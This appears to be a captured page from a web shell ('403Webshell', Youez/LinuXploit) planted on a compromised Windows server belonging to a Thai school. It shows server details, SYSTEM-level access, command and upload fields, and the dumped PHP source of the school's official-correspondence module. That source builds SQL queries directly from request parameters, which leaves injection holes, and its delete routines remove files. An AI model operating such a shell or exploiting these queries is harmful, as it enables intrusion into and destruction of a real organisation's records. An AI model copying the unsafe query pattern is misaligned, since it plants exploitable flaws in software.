403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myschool/watdontoom/modules/tkk2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : E:/Inetpub/www/myschool/watdontoom/modules/tkk2/index.php
<?
CheckUser($_SESSION['user_user'], $_SESSION['user_pwd']);
?>
<TABLE cellSpacing=0 cellPadding=0 width=100% height="500" border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>
<?
if($_GET[op] == "tkk2_read"){
	//////////////////////////////////////////// กรณีแก้ไข Form
	if(CheckLevelUser($_SESSION['user_user'], $_GET[op])){
{
	
?><!-- user -->
<div align="center"> 
  <table width="100%" height="28"border="0" cellspacing="0" cellpadding="0">
 <tr>       
 <td>
<?
//CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
?>
<A HREF="?name=tkk3&file=tabainperson">&nbsp;&nbsp;<img src="images/back.png" align="absmiddle" ></A>&nbsp;&nbsp;<B>หนังสือราชการเข้าใหม่ ของ <? echo $arr[user][category_name];?></B>
</td>
	          </tr>
  </table>
</div>		
 <table width="100%"  align=center  cellspacing="2" cellpadding="0" >
  <tr bgcolor="#336633" height=25>
   <td width="12%" align=center ><font color="#FFFFFF"><B>เลขหนังสือ</B></font></td>
   <td  align=center width="40%"><font color="#FFFFFF"><B>เรื่อง</B></font></td>
   <td width="15%" align=center  ><font color="#FFFFFF"><B>จาก</B></font></td>
   <td  align=center width="10%"><font color="#FFFFFF"><B>การปฏิบัติ</B></font></td>
 <?
					 if(($arr[user][work]>2)){ 	  
?>
 <td  align=center width="5%"><font color="#FFFFFF"><B>จัดการ</B></font></td>
<? }?>
 <?
					 if(($arr[user][odpr]!=D2)AND($arr[user][work]!=2)){ 	  
?>
 <td  align=center width="5%"><font color="#FFFFFF"><B>ส่ง</B></font></td>

<? }?>
  </tr>  
<?
//แสดงข่าวสาร/ประชาสัมพันธ์ 
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);

$limit = 10 ;
$SUMPAGE = $db->num_rows(TB_TKK2,"id","$SQLwhere category='".$arr[user][id]."' ");
$page=$_GET[page];
if (empty($page)){
	$page=1;
}
$rt = $SUMPAGE%$limit ;
$totalpage = ($rt!=0) ? floor($SUMPAGE/$limit)+1 : floor($SUMPAGE/$limit); 
$goto = ($page-1)*$limit ;
$res[tkk2] = $db->select_query("SELECT * FROM ".TB_TKK2." WHERE category='".$arr[user][id]."' ORDER BY post_date DESC LIMIT $goto, $limit ");
$count=0;
while($arr[tkk2] = $db->fetch($res[tkk2])){
if ($i%2==0) 
{
	?><tr bgcolor="#F0FFFF" class="unnamed1"><?
} else {
	?><tr bgcolor="#FFFFFF" class="unnamed2"><?
} ?>
     <td valign="top"> &nbsp;&nbsp;<?echo $arr[tkk2][tabain];?>
     </td> 
     <td valign="top"><IMG SRC="myoffice/<? echo $arr[tkk2][praphet];?>.png" Width=15 >&nbsp;&nbsp;<A HREF="popup.php?name=tkk2&file=readtkk2_2&id=<?echo $arr[tkk2][id];?>" onclick="return hs.htmlExpand(this, { contentId: 'highslide-html', objectType: 'iframe', objectWidth: 800, objectHeight: 600} )" class="highslide"><?echo $arr[tkk2][topic];?></A>	 &nbsp;&nbsp;ลว. <?echo "".thai_date_fullmonth(strtotime($arr[tkk2][date])."" );?>
	 <BR>
<?
					 if ($arr[tkk2][full_text]){ 	  
?>
&nbsp;&nbsp;<B>เอกสารแนบ :</B> 
<a href="data/tkk2/<?=$arr[tkk2][full_text];?>" target="_blank"><font color=red>หนังสือนำ</font></A>
		  <? } else {
		 echo "";
	 }?>
<?
					 if($arr[tkk2][full_texts]){ 	  
?>
,&nbsp;<a href="data/tkk2/<?=$arr[tkk2][full_texts];?>" target="_blank"><font color=red>ไฟล์แนบ1</font></A>
<? } else {echo "";}?>
<?
					 if($arr[tkk2][full_textu]){ 	  
?>
,&nbsp;<a href="data/tkk2/<?=$arr[tkk2][full_textu];?>" target="_blank"><font color=red>ไฟล์แนบ2</font></A>
<? } else {echo "";}?>
<?
					 if($arr[tkk2][full_texto]){ 	  
?>
,&nbsp;<a href="data/tkk2/<?=$arr[tkk2][full_texto];?>" target="_blank"><font color=red>ไฟล์แนบ3</font></A> 
<? } else {echo "";}?>
<?
					 if($arr[tkk2][full_texty]){ 	  
?>
,&nbsp;<a href="data/tkk2/<?=$arr[tkk2][full_texty];?>" target="_blank"><font color=red>ไฟล์แนบ4</font></A> |
<? } else {echo "";}?>
	 </td>
     
 
<td valign="top" align="center"><?echo $arr[tkk2][school];?></td>
<td valign="top" align="center">
<?
					 if(($arr[user][work]==8)AND($arr[tkk2][enable_comment ]==2)){ 	  
?>
ไม่ใช่หนังสือของ<br><? echo $arr[tkk2][group_ska];?>
<? }?>

<?
					 if($arr[tkk2][edit]==เสนอผู้บริหาร){ 	  
?>
<A HREF="?name=tkk2&file=readod&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color=red>ดำเนินการต่อ</font></A>
<? } else {echo "";}?>
<?
					 if($arr[tkk2][edit]==เสนอรักษาการ){ 	  
?>
<A HREF="?name=tkk2&file=readod&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color=red>ดำเนินการต่อ</font></A>
<? } else {echo "";}?>
<?
					 if(($arr[tkk2][edit]==หัวหน้ากลุ่มงาน)){ 	  
?>
<A HREF="?name=tkk2&file=readtwo&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color red>ดำเนินการต่อ</font></A>
<? } else {echo ""; }?>
<?
					 if(($arr[tkk2][edit]==รองผู้อำนวยการ)){ 	  
?>
<A HREF="?name=tkk2&file=readtree&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color red>ดำเนินการต่อ</font></A>
<? } else {echo ""; }?>
<?
					 if(($arr[tkk2][edit]==นำส่ง)OR($arr[tkk2][edit]==จัดเก็บ)){ 	  
?>
<A HREF="?name=tkk2&file=sentperson&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>">นำส่ง</A>
<BR>
<A HREF="javascript:NewWindow('popup2.php?name=tkk2&file=readsang&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>','acepopup','1024','720','center','front');"><font color="blue">ดูรายละเอียด</FONT></A>
<? } else {echo ""; }?>
 <?
					 if(($arr[tkk2][edit]==ทราบ) OR ($arr[tkk2][edit]==ชอบ)  OR ($arr[tkk2][edit]==เอกสารมอบ) OR ($arr[tkk2][edit]==ลงนัด)OR($arr[tkk2][edit]==แจ้ง) OR ($arr[tkk2][edit]==มอบ)){ 	  
?>

<? echo $arr[tkk2][edit];?><BR><A HREF="javascript:NewWindow('popup2.php?name=tkk2&file=readsang&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>','acepopup','1024','720','center','front');"><font color="blue">ดูรายละเอียด</FONT></A>

 <? } else {echo ""; }?>

	 </td>
 <?
					 if(($arr[user][odpr]!=D2)AND($arr[user][work]!=2)){ 	  
?>
<td valign="top" align="center"  >
<?
					 if($arr[tkk2][edit]==คืน){ 	  
?>
<A HREF="?name=tkk2&file=sentgroupedit&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color=red>แก้ไข</font></A>
<? } else {echo ""; }?>
<?
					 if(($arr[tkk2][edit]==ทราบ) OR ($arr[tkk2][edit]==ชอบ)  OR ($arr[tkk2][edit]==เอกสารมอบ) OR ($arr[tkk2][edit]==ลงนัด)OR($arr[tkk2][edit]==แจ้ง) OR ($arr[tkk2][edit]==มอบ)){ 	  
?>
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
				?> 				 
<FORM NAME="myform2" METHOD=POST ACTION="?name=tkk2&file=tabain2&op=tkk2_edit&action=edit&id=<?=$arr[tkk2][id];?>" enctype="multipart/form-data">
<INPUT TYPE="hidden" NAME="CATEGORY" VALUE="o" readonly style=\"color: #FF0000">
<INPUT TYPE="hidden" NAME="EDIT" VALUE="<?=$arr[tkk2][edit];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="CAT" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="NAMECOM" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="submit" value="จัดเก็บ" name="submit"> 
</FORM>
<? } else {echo ""; }?>
<?
					 if(($arr[tkk2][sentback]==ส่งคืนสารบรรณ)AND($arr[tkk2][edit]!=หัวหน้ากลุ่มงาน)){ 	  
?>
<A HREF="?name=tkk2&file=tabain3&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>"><font color=red>ส่งคืน</font></A>
<BR>
<A HREF="?name=tkk3&file=addtkk2&op=tkk3_add&id=<? echo $arr[tkk2][id];?>"><font color=blue>นำแจ้งเวียน</font></A>
<? } else {echo "";}?>
</td>
 <? }?>
<?
					 if(($arr[tkk2][edit]==ทราบ) OR ($arr[tkk2][edit]==ชอบ) OR ($arr[tkk2][edit]==เอกสารมอบ)OR ($arr[tkk2][edit]==แจ้ง) OR ($arr[tkk2][edit]==มอบ)  OR ($arr[tkk2][edit]==ลงนัด)){ 	  
?>
<?
					 if(($arr[user][work]==8)or($arr[user][work]==3)){ 	  
?>

<td align="center" Valign="top">
<A HREF="?name=tkk2&file=sentperson&op=tkk2_edit&id=<? echo $arr[tkk2][id];?>">นำส่ง จนท.</A>
<BR>
<?
					 if(($arr[tkk2][edit]==ทราบ) OR ($arr[tkk2][edit]==ชอบ) OR ($arr[tkk2][edit]==เอกสารมอบ)OR ($arr[tkk2][edit]==แจ้ง) OR ($arr[tkk2][edit]==มอบ)  OR ($arr[tkk2][edit]==ลงนัด)){ 	  
?>
<A HREF="?name=tkk3&file=addtkk2&op=tkk3_add&id=<? echo $arr[tkk2][id];?>"><font color=red>นำแจ้งเวียน</font></A>
		  <? } else {
		 echo "";
	 }?>
 </div>	

     </td>
 <? }?>
 <? }?>
<?
					 if($arr[tkk2][edit]==นำส่ง){ 	  
?>
<td align="center"  valign="top">
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
				?> 				 
<FORM NAME="myform2" METHOD=POST ACTION="?name=tkk2&file=tabain2&op=tkk2_edit&action=edit&id=<?=$arr[tkk2][id];?>" enctype="multipart/form-data">
<INPUT TYPE="hidden" NAME="CATEGORY" VALUE="o" readonly style=\"color: #FF0000">
<INPUT TYPE="hidden" NAME="EDIT" VALUE="จัดเก็บ" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="CAT" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="NAMECOM" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="submit" value="จัดเก็บ" name="submit"> 
</FORM>
<? } else {echo "";}?>
<?
					 if($arr[tkk2][edit]==จัดเก็บ){ 	  
?>
<td align="center"  valign="top">
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
				?> 				 
<FORM NAME="myform2" METHOD=POST ACTION="?name=tkk2&file=tabain2&op=tkk2_edit&action=edit&id=<?=$arr[tkk2][id];?>" enctype="multipart/form-data">
<INPUT TYPE="hidden" NAME="CATEGORY" VALUE="o" readonly style=\"color: #FF0000">
<INPUT TYPE="hidden" NAME="EDIT" VALUE="จัดเก็บ" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="CAT" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="hidden" NAME="NAMECOM" VALUE="<?=$arr[user][id];?>" readonly style=\"color: #FF0000">
	<INPUT TYPE="submit" value="<? echo $arr[tkk2][edit];?>" name="submit"> 
</FORM>
<? } else {echo "";}?>
</td>
</TR>

	<?
$count++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();
//จบการแสดงข่าวสาร
?> 
				</table>
<div align="right">
	</TR></TD></TABLE>
				<BR>
				<table border="0" cellpadding="0" cellspacing="1" width="100%" align=center>
					<tr>
						<td align=right>
				<?
				SplitPage($page,$totalpage,"?name=tkk2&op=tkk2_read&category=".$_GET[category]."");
				echo $ShowSumPages ;
				echo $ShowPages ;
				//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);
				?> 				
			<!-- End tkk2 -->
<?
	}
?>	
<?
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk2_del" AND $_GET[action] == "multidel"){
	//////////////////////////////////////////// กรณีลบ Multi
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		while(list($key, $value) = each ($_POST['list'])){
			$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
			$res[tkk2] = $db->select_query("SELECT * FROM ".TB_TKK2." WHERE id='".$value."' ");
			$arr[tkk2] = $db->fetch($res[tkk2]);
			$db->del(TB_TKK2," id='".$value."' "); 
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);


			@unlink("data/tkk2/".$arr[tkk2][full_text]);
			@unlink("data/tkk2/".$arr[tkk2][full_texts]);
			@unlink("data/tkk2/".$arr[tkk2][full_textu]);
			@unlink("data/tkk2/".$arr[tkk2][full_texto]);
			$db->closedb ();
		}
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=user&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=tkk2&file=sarabanarea&op=tkk2_read&category=".$arr[user][id]."\">";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
else if($_GET[op] == "tkk2_del"){
	//////////////////////////////////////////// กรณีลบ Form
	if(CheckLevelUser($_SESSION['user_user'],$_GET[op])){
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
//		$db->del(TB_tkk2," id='".$_GET[id]."' ");
			$res[tkk2] = $db->select_query("SELECT * FROM ".TB_TKK2." WHERE id='".$_GET[id]."' ");
			$arr[tkk2] = $db->fetch($res[tkk2]);
			$db->del(TB_TKK2," id='".$_GET[id]."' "); 
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[user] = $db->select_query("SELECT * FROM ".TB_user." WHERE username='".$_SESSION['user_user']."' ");
		$arr[user] = $db->fetch($res[user]);


			@unlink("data/tkk2/".$arr[tkk2][full_text]);
			@unlink("data/tkk2/".$arr[tkk2][full_texts]);
			@unlink("data/tkk2/".$arr[tkk2][full_textu]);
			@unlink("data/tkk2/".$arr[tkk2][full_texto]);
		$db->closedb ();
		$ProcessOutput .= "<BR><BR>";
		$ProcessOutput .= "<CENTER><A HREF=\"?name=admin&file=main\"><IMG SRC=\"images/icon/login-welcome.gif\" BORDER=\"0\"></A><BR><BR>";
		$ProcessOutput .= "<FONT COLOR=\"#336600\"><B>ได้ทำการลบเรียบร้อยแล้ว</B></FONT><BR><BR>";
		$ProcessOutput .= "<meta http-equiv=\"refresh\" content=\"1 ;url=?name=tkk2&file=sarabanarea&op=tkk2_read&category=".$arr[user][id]."\">";
		$ProcessOutput .= "</CENTER>";
		$ProcessOutput .= "<BR><BR>";
	}else{
		//กรณีไม่ผ่าน
		$ProcessOutput = $PermissionFalse ;
	}
	echo $ProcessOutput ;
}
?>
					</TD>
				</TR>
			</TABLE>
			<!-- Admin -->
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit